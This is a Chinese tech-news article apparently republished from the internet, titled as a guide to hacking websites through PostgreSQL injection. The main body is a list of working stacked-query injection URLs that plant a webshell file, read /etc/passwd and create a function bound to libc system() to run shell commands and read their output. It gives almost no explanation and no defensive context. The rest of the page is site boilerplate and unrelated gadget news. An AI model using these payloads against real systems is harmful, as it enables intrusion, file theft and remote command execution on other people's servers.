新闻 手机 家电 数码 电脑 财经 大模型 直播

黑客如何用postgresql注入黑掉网站

  • 来源: 互联网 作者: 李祥敬   2010-01-18/15:29

    • 如何获得webshell

    http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);

    http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$$$);

    http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;

    如何读文件

    http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);

    http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;

    http://127.0.0.1/postgresql.php?id=1;select * from myfile;

    执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。

    当然,这些的postgresql的数据库版本必须大于8.X。

    创建一个system的函数:

    CREATE FUNCTION system(cstring) RETURNS int AS ’/lib/libc.so.6’, ’system’ LANGUAGE ’C’ STRICT

    创建一个输出表:

    CREATE TABLE stdout(id serial, system_out text)

    执行shell,输出到输出表内:

    SELECT system(’uname -a > /tmp/test’)

    copy 输出的内容到表里面;

    COPY stdout(system_out) FROM ’/tmp/test’

    从输出表内读取执行后的回显,判断是否执行成功

    SELECT system_out FROM stdout

    下面是测试例子

    /store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- /store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS

    ’/lib/libc.so.6’,’system’ LANGUAGE ’C’STRICT --/store.php?id=1; SELECT system(’uname -a > /tmp/test’) --/store.php?id=1; COPY stdout(system_out) FROM ’/tmp/test’ --/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out

    ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--


    评论 {{userinfo.comments}}

    查看全部评论
    {{money}}

    {{question.question}}

    A {{question.A}}
    B {{question.B}}
    C {{question.C}}
    D {{question.D}}
    提交

    荣耀Magic7系列全面升级大王影像,首发AI超级长焦拍远更清晰
    标签: 荣耀 2024-12-23
    荣耀Magic7系列全面升级大王影像,首发AI超级长焦拍远更清晰

    售价999,打卡返全款购机券!闪极AI「拍拍镜」震撼发布
    标签: 闪极科技 拍拍镜 2024-12-23
    售价999,打卡返全款购机券!闪极AI「拍拍镜」震撼发布

    安全可靠 精准高效 讯飞AI录音笔S8离线版体验
    标签: 科大讯飞 录音笔 2024-12-23
    安全可靠 精准高效 讯飞AI录音笔S8离线版体验

    昨夜今晨:传ChatGPT5研发受阻 ARM与高通纠纷案判决出炉
    标签: 高通 ARM ChatGPT 华硕 360 OPPO 2024-12-23
    昨夜今晨:传ChatGPT5研发受阻 ARM与高通纠纷案判决出炉

    比亚迪技术鱼池持续高产 整车智能重新定义智能化下半场
    标签: 比亚迪 整车智能 智能化 2024-12-20
    比亚迪技术鱼池持续高产 整车智能重新定义智能化下半场

    驱动号 更多

    联系电话:010-62681584

    电子邮箱:sw@qudong.com

    地址:北京市海淀区学院路30号

    驱动中国官方微信

    驱动中国官方微信

    ©驱动中国 Qudong.com  All Rights Reserved 版权所有 复制必究 京ICP备11013097号广播电视节目许可证:(京)字第07618号